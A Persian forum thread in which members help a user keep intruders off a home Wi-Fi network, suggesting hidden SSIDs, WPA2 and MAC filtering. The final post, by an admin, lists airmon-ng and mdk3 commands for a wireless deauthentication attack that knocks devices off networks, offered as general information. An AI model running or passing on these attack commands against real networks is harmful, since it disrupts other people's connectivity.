مزاحم در شبکه وایرلس

tichismor

عضو جدید
سلام دوستان
یکی از فامیلامون شبکه وایرلس داره
جدیدا یه برنامه نصب کرده به نام who is on my wifi که بهش میگه کیا با آی پی و مک و اینا رو شبکه اون هستند
فهمیده یکی دو نفر میان رو شبکه و استفاده می کنن یعنی هکش کردن
چطوری می تونه اینا رو پیدا کنه ؟؟ یا کاری کنه که دیگه کسی نتونه بیاد رو شبکش ؟؟ یا طوری بشه که بتونه به اینا پیام بفرسته که با زبون خوش قبول کنن ه نیان رو شبکه و اینا :دی

خلاصه یه راهی باشه برای عدم دسترسی به شبکه از جانب دیگران
ممنون

sanamsayna

کاربر فعال مهندسی IT ,
کاربر ممتاز
سلام دوستان
جدیدا یه برنامه نصب کرده به نام who is on my wifi که بهش میگه کیا با آی پی و مک و اینا رو شبکه اون هستند
چطوری می تونه اینا رو پیدا کنه ؟؟ یا کاری کنه که دیگه کسی نتونه بیاد رو شبکش ؟؟ یا طوری بشه که بتونه به اینا پیام بفرسته که با زبون خوش قبول کنن ه نیان رو شبکه و اینا :دی

ممنون
خوب می تونن رمز وایرلس رو تغییر بدن و یه رمز پیچیده انتخاب کنن یکی هم ssid رو تغییر بدن بهتره

tichismor

عضو جدید
خوب می تونن رمز وایرلس رو تغییر بدن و یه رمز پیچیده انتخاب کنن یکی هم ssid رو تغییر بدن بهتره

بله خیلی ممنون از پاسختون ولی همین الان هم پسوردش خیلی ساده نیست به عبارتی خیلی هم پیچیدس :|

sanamsayna

کاربر فعال مهندسی IT ,
کاربر ممتاز
بله خیلی ممنون از پاسختون ولی همین الان هم پسوردش خیلی ساده نیست به عبارتی خیلی هم پیچیدس :|
خوب متاسفانه یکی از معایب وایرلس اینه که امن نیست و اگه خوب تنظیم نکنیم راحت می تونن نفوذ کنن.
من چند راه حل میگم اینا رو تنظیم کنین فکر کنم تا حدودی از این نفوذ ها راحت میشین ( این بستگی داره اون طرفی که نفوذ کرده چه قدر حرفه ای باشه که اگه هکر باشه نمی دونم بتونه هک کنه یا نه )
1. ssid را مخفی کنید اون شخص که بخواد از شبکه استفاده کنه باید ssid رو بدونه و فقط شما می دونین یعنی برا بقیه نشون نمیده ( بردکست ssid را غیر فعال کنید )
2. رمز را در حالت wap 2 بزارید
3. اگر فقط در سیستم های مشخصز از اینترنت استفاده می کنید مک ***** استفاده کنید :
روش تنظیم آن : در منوی سرچ cmd را تایپ کنید و آن را به صورت run as admin باز کنید.
در آن جا دستور ipconfig /all را تایپ کنید در آن جا قسمت wireless lan adaptor wireless network cionnection یک قسمتی هست به اسم physical address اون مک وایرلس شماست.
حالا در مورورگرتون آدرس 192.168.1.1 رو بزنید تا به صفحه تنظیمات مودمتان بروید.در آن جا کاربر و رمز admin هست در آن جا تب وایرلس قسمت wireless mac filter را فعال کنید قسمت پایین آن دستور permit ... را تیک بزنید.سپس در قسمت پایین اون آدرس مکی که می خواید بتونه از اینترنت استفاده کنه را وارد کنید( ببخشید نتونستم عکس بزارم )

Drago

پیشکسوت فعال فناوری اطلاعات
کاربر ممتاز
منم همون Mac Filtering رو پیشنهاد میکنم.

sanamsayna

کاربر فعال مهندسی IT ,
کاربر ممتاز
منم همون Mac Filtering رو پیشنهاد میکنم.
اگه بخوایم گوشی رو هم به این لیست اضافه کنیم
ااا خودم پیدا کردم :smile: گفتم بزارم شاید کسی لازم اش شد خیلی جالبه .گوشی هم مک داره :w11:
روش به دست آوردن مک آدرس گوشی : کد زیر رو تو گوشیتون بزنید :
# 62209526 #*

آخرین ویرایش:

tichismor

عضو جدید
خیلی ممنون از دوستان
فقط یه سوال :|
من تو setting مودم که میرم جایی برای mac filter نداره :(

یه بخش داره
wireless network setting
که شامل
enable wireless
ssid
enable auto channel scan
hid wireless network
و
wirelss security mode
که شامل
security mode
و
WPA
که شامل
WPA mode
croup key update interval
و
pre- shared key
که شامل
pre shared key
هست و mac filter نداره :(

مدل مودم هم dsl-2600 dlink

sanamsayna

کاربر فعال مهندسی IT ,
کاربر ممتاز
خیلی ممنون از دوستان
فقط یه سوال :|
من تو setting مودم که میرم جایی برای mac filter نداره :(

یه بخش داره
wireless network setting
که شامل
enable wireless
ssid
enable auto channel scan
hid wireless network
و
wirelss security mode
که شامل
security mode
و
WPA
که شامل
WPA mode
croup key update interval
و
pre- shared key
که شامل
pre shared key
هست و mac filter نداره :(

مدل مودم هم dsl-2600 dlink
میشه قسمت enable وایرلس رو عکس اش رو بزارین می خوام ببینم فقط یه گزینه هست یا پایین تنظیمات دیگه داره یا نه؟

tichismor

عضو جدید
حقیقتا سیستم خودم نیست عکس ندارم
ولی دیدم هیچی نداره کامل نوشتم که چیا داره همیناس :(

پیرجو

مدیر ارشد
مدیر کل سایت
مدیر ارشد
سلام دوستان

ممنون

دوست عزیز ایشون با نرم افزارهایی مثل ip scanner میان Ip کل شبکه رو اسکن می کنن و افراد انلاین ور مشخص می کنن و به دلیل داشتن پسورد نمیتونن وارد سیستم بشن پس میان اون افراد رو دیس کانتکت میکنن تا سرعت روی شبکه بالا بره و بعد خودشون از سرعت بهره ببرن، با گفتن به شرکت خدماتی هم مشکل رفع نمیشه. بعضی ها هم سو استفاده های دیگه ای می کنن مثلا با خارج کردن کل افراد روی شبکه از سرعت برای یک حمله استفاده می کنن.

دستورات لازم جهت حمله

دستورات:
کد:
ifconfig wlan0 up iwlist wlan0 scan
این دستور لیست شبکه های موجود در رنج شما را نشان خواهد داد

کد:
airmon-ng start wlan0
پاکت ها رو روی یک کنال میاره

کد:
cd /pentest/wireless/mdk3
وارد برنامه mdk3 می شود

کد:
mkd3 mon0 d -b blacklist -c channel
محتوی آدرس شبکه جهت حمله

واسه اطلاعات عمومیتون خوبه. :d
دستورات در back track قابل اجرا می باشند.

بالا